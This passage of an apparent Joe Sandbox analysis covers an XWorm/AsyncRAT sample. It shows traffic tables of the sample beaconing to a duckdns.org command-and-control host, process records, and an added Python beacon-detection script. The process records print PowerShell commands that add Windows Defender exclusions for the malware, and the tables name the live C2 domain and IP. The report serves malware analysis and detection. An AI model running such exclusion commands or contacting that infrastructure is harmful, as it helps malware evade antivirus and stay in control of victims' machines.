Oct 31, 2024 10:34:09.198349953 CET | 50036 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:09.203728914 CET | 4068 | 50036 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:09.216027975 CET | 4068 | 50036 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:09.216100931 CET | 50036 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:13.643981934 CET | 50036 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:13.645595074 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:13.648953915 CET | 4068 | 50036 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:13.650450945 CET | 4068 | 50037 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:13.650548935 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:13.738044024 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:13.742933035 CET | 4068 | 50037 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:13.986479998 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:13.991511106 CET | 4068 | 50037 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:14.241523027 CET | 4068 | 50037 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:14.241600990 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:18.910022974 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:18.914136887 CET | 50038 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:19.300350904 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:19.753530025 CET | 4068 | 50037 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:19.753545046 CET | 4068 | 50038 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:19.753556013 CET | 4068 | 50037 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:19.753730059 CET | 50038 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:19.753735065 CET | 50037 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:19.852102995 CET | 50038 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:19.857070923 CET | 4068 | 50038 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:20.335119009 CET | 4068 | 50038 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:20.335241079 CET | 50038 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:24.878627062 CET | 50038 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:24.881057978 CET | 50039 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:24.883557081 CET | 4068 | 50038 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:24.885972977 CET | 4068 | 50039 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:24.886061907 CET | 50039 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:24.970992088 CET | 50039 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:24.975934029 CET | 4068 | 50039 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:25.484796047 CET | 4068 | 50039 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:25.485380888 CET | 50039 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:30.159851074 CET | 50039 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:30.163177967 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:30.164940119 CET | 4068 | 50039 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:30.168133974 CET | 4068 | 50040 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:30.168204069 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:30.197448969 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:30.202296019 CET | 4068 | 50040 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:30.261044979 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:30.266307116 CET | 4068 | 50040 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:30.756261110 CET | 4068 | 50040 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:30.756377935 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:35.755913973 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:35.759798050 CET | 50041 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:36.097088099 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:36.780510902 CET | 4068 | 50040 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:36.780546904 CET | 4068 | 50041 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:36.780561924 CET | 4068 | 50040 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:36.780675888 CET | 50041 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:36.780678988 CET | 50040 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:36.915524960 CET | 50041 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:36.920545101 CET | 4068 | 50041 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:37.374737978 CET | 4068 | 50041 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:37.374983072 CET | 50041 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:42.034756899 CET | 50041 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:42.039876938 CET | 4068 | 50041 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:43.661561966 CET | 50042 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:43.666579008 CET | 4068 | 50042 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:43.666668892 CET | 50042 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:43.695864916 CET | 50042 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:43.702928066 CET | 4068 | 50042 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:43.802376986 CET | 50042 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:43.807869911 CET | 4068 | 50042 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:44.260122061 CET | 4068 | 50042 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:44.260189056 CET | 50042 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:48.940834999 CET | 50042 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:48.943566084 CET | 50043 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:48.945710897 CET | 4068 | 50042 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:48.948404074 CET | 4068 | 50043 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:48.948471069 CET | 50043 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:48.973530054 CET | 50043 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:48.978507042 CET | 4068 | 50043 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:48.997335911 CET | 50043 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:49.003106117 CET | 4068 | 50043 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:49.551551104 CET | 4068 | 50043 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:49.551656008 CET | 50043 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.066082001 CET | 50043 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.068067074 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.071110010 CET | 4068 | 50043 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:54.072978020 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:54.073113918 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.127953053 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.133024931 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:54.134109974 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.139267921 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:54.207954884 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.212928057 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:54.473870039 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.478979111 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:54.826952934 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:54.832045078 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:56.655663013 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:56.660799026 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:56.674664021 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:56.680582047 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:56.729197979 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:56.734318018 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.027791977 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.032898903 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.075012922 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.079924107 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.110064030 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.115557909 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.115605116 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.121422052 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.125989914 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.131685972 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.142421007 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.147192001 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.151961088 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.157218933 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.159034014 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.164145947 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:57.198723078 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:57.203557014 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:58.746599913 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:58.753093004 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:58.882929087 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:58.891921997 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:35:01.102314949 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:35:01.107609034 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:35:01.174329042 CET | 50044 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:35:01.180030107 CET | 4068 | 50044 | 104.223.35.76 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 10:31:26.820538998 CET | 52514 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:31:27.831769943 CET | 52514 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:31:28.848470926 CET | 52514 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:31:30.299156904 CET | 53 | 52514 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:31:30.299177885 CET | 53 | 52514 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:31:30.299190044 CET | 53 | 52514 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:32:30.035855055 CET | 52860 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:32:31.034739971 CET | 52860 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:32:32.050465107 CET | 52860 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:32:34.046374083 CET | 53 | 52860 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:32:34.046638966 CET | 53 | 52860 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:32:34.046649933 CET | 53 | 52860 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:32:35.161864996 CET | 56343 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:32:35.778625965 CET | 53 | 56343 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:33:36.100174904 CET | 53566 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:33:37.135565042 CET | 53566 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:33:38.131395102 CET | 53566 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:33:40.110851049 CET | 53 | 53566 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:33:40.110876083 CET | 53 | 53566 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:33:40.110886097 CET | 53 | 53566 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:33:40.941778898 CET | 54307 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:33:41.059111118 CET | 53 | 54307 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:34:42.042177916 CET | 60234 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:34:43.056642056 CET | 60234 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 10:34:43.660485029 CET | 53 | 60234 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 10:34:43.660502911 CET | 53 | 60234 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 10:31:26.820538998 CET | 192.168.2.5 | 1.1.1.1 | 0x3e97 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:31:27.831769943 CET | 192.168.2.5 | 1.1.1.1 | 0x3e97 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:31:28.848470926 CET | 192.168.2.5 | 1.1.1.1 | 0x3e97 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:30.035855055 CET | 192.168.2.5 | 1.1.1.1 | 0xb519 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:31.034739971 CET | 192.168.2.5 | 1.1.1.1 | 0xb519 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:32.050465107 CET | 192.168.2.5 | 1.1.1.1 | 0xb519 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:35.161864996 CET | 192.168.2.5 | 1.1.1.1 | 0x5b83 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:36.100174904 CET | 192.168.2.5 | 1.1.1.1 | 0xb726 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:37.135565042 CET | 192.168.2.5 | 1.1.1.1 | 0xb726 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:38.131395102 CET | 192.168.2.5 | 1.1.1.1 | 0xb726 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:40.941778898 CET | 192.168.2.5 | 1.1.1.1 | 0x490d | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:34:42.042177916 CET | 192.168.2.5 | 1.1.1.1 | 0xe7d3 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:34:43.056642056 CET | 192.168.2.5 | 1.1.1.1 | 0xe7d3 | Standard query (0) | kanrplest.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 10:31:30.299156904 CET | 1.1.1.1 | 192.168.2.5 | 0x3e97 | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:31:30.299177885 CET | 1.1.1.1 | 192.168.2.5 | 0x3e97 | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:31:30.299190044 CET | 1.1.1.1 | 192.168.2.5 | 0x3e97 | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:34.046374083 CET | 1.1.1.1 | 192.168.2.5 | 0xb519 | Server failure (2) | kanrplest.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:34.046638966 CET | 1.1.1.1 | 192.168.2.5 | 0xb519 | Server failure (2) | kanrplest.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:34.046649933 CET | 1.1.1.1 | 192.168.2.5 | 0xb519 | Server failure (2) | kanrplest.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:32:35.778625965 CET | 1.1.1.1 | 192.168.2.5 | 0x5b83 | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:40.110851049 CET | 1.1.1.1 | 192.168.2.5 | 0xb726 | Server failure (2) | kanrplest.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:40.110876083 CET | 1.1.1.1 | 192.168.2.5 | 0xb726 | Server failure (2) | kanrplest.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:40.110886097 CET | 1.1.1.1 | 192.168.2.5 | 0xb726 | Server failure (2) | kanrplest.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:33:41.059111118 CET | 1.1.1.1 | 192.168.2.5 | 0x490d | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:34:43.660485029 CET | 1.1.1.1 | 192.168.2.5 | 0xe7d3 | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 10:34:43.660502911 CET | 1.1.1.1 | 192.168.2.5 | 0xe7d3 | No error (0) | kanrplest.duckdns.org | | 104.223.35.76 | A (IP address) | IN (0x0001) | false
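
The TCP and DNS tables above show the sample opening a fresh connection to 104.223.35.76:4068 from a new ephemeral port roughly every five seconds, and re-resolving kanrplest.duckdns.org in between, twice getting Server failure before a retry succeeded. As an added example that is not part of the Joe Sandbox report, the following Python scores that cadence the way a network detection would: it takes the first client-to-server packet of each connection, uses the median gap between connection starts as the period estimate, and reports what fraction of gaps sit inside a tolerance band. The TCP_ROWS and DNS_ANSWERS strings are transcribed from the tables above as pipe-separated fields (constructed input); the 20% tolerance, the 60% regularity cut-off and the dynamic-DNS suffix list are assumptions chosen for illustration.

```python
"""Beacon-cadence check over the C2 traffic recorded in this report.

Added example, not part of the Joe Sandbox report. TCP_ROWS and DNS_ANSWERS are
transcribed from the report's packet and DNS tables as pipe-separated fields
(constructed input); the 20% tolerance, 60% regularity cut-off and the
dynamic-DNS suffix list are assumptions chosen for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# timestamp | src port | dst port | src IP | dst IP (a subset of the report's TCP rows)
TCP_ROWS = """\
Oct 31, 2024 10:33:09.419363022 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:09.424417019 CET | 4068 | 50024 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:09.424525976 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.753369093 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.757482052 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.052181005 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:25.255458117 CET | 50027 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.725279093 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:41.060172081 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.161261082 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:51.660214901 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.259294033 CET | 50032 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.443573952 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:02.694991112 CET | 50034 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.310826063 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
"""

# timestamp | name | address, from the report's successful DNS answers
DNS_ANSWERS = """\
Oct 31, 2024 10:31:30.299156904 CET | kanrplest.duckdns.org | 104.223.35.76
Oct 31, 2024 10:33:41.059111118 CET | kanrplest.duckdns.org | 104.223.35.76
"""

# Free dynamic-DNS providers often used for commodity RAT C2 (assumed list, extend as needed).
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net", ".hopto.org")


def parse_timestamp(ts):
    """Parse 'Oct 31, 2024 10:33:09.419363022 CET'; datetime only carries microseconds."""
    date, clock, _tz = ts.rsplit(" ", 2)
    hms, frac = clock.split(".")
    return datetime.strptime(f"{date} {hms}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_row(line):
    ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
    return parse_timestamp(ts), int(sport), int(dport), sip, dip


def connection_starts(tcp_rows, client_ip):
    """Earliest client->server packet per source port: one entry per outbound connection."""
    first = {}
    for dt, sport, dport, sip, dip in map(parse_row, tcp_rows.strip().splitlines()):
        if sip != client_ip:
            continue  # server->client packets never open a connection
        key = (dip, dport, sport)
        if key not in first or dt < first[key]:
            first[key] = dt
    return first


def resolved_names(dns_rows):
    """Map each answered address to the names that resolved to it."""
    names = defaultdict(set)
    for line in dns_rows.strip().splitlines():
        _ts, name, addr = (f.strip() for f in line.split("|"))
        names[addr].add(name.lower().rstrip("."))
    return names


def beacon_report(tcp_rows, dns_rows, client_ip, tolerance=0.2, min_regular=0.6, min_conns=4):
    """Per (server IP, port): reconnect period and whether the cadence looks like a beacon.

    The median, not the mean, is the period estimate so that one delayed reconnect
    (e.g. after a failed DNS lookup) or an immediate re-dial does not mask an
    otherwise fixed interval.
    """
    starts_by_dst = defaultdict(list)
    for (dip, dport, _sport), dt in connection_starts(tcp_rows, client_ip).items():
        starts_by_dst[(dip, dport)].append(dt)
    names = resolved_names(dns_rows)
    findings = {}
    for dst, starts in starts_by_dst.items():
        if len(starts) < min_conns:
            continue
        starts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        period = median(gaps)
        regular = sum(abs(g - period) <= tolerance * period for g in gaps) / len(gaps)
        hostnames = sorted(names.get(dst[0], ()))
        findings[dst] = {
            "connections": len(starts),
            "period_s": round(period, 2),
            "regular_fraction": round(regular, 2),
            "beacon": regular >= min_regular,
            "names": hostnames,
            "dynamic_dns": any(h.endswith(DYNDNS_SUFFIXES) for h in hostnames),
        }
    return findings


if __name__ == "__main__":
    for (ip, port), finding in beacon_report(TCP_ROWS, DNS_ANSWERS, "192.168.2.5").items():
        print(f"{ip}:{port} {finding}")
```

On the rows above the period comes out at about 5.25 s with 8 of 11 gaps inside the band, so the destination is reported as a beacon resolved through a dynamic-DNS name. The one gap of about 10 s (source port 50028 to 50029) lines up with the three queries the resolver answered with Server failure at 10:33:40; the sample re-resolved at 10:33:40.94, got 104.223.35.76 back at 10:33:41.059 and opened the next connection at 10:33:41.060, which is why a mean-based jitter test would have scored this traffic as irregular.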

Target ID: 0
Start time: 05:30:59
Start date: 31/10/2024
Path: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Imagebase: 0xd70000
File size: 575'496 bytes
MD5 hash: FF9E45D7326698F34526793BF1244811
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

                              Target ID:3
                              Start time:05:31:01
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
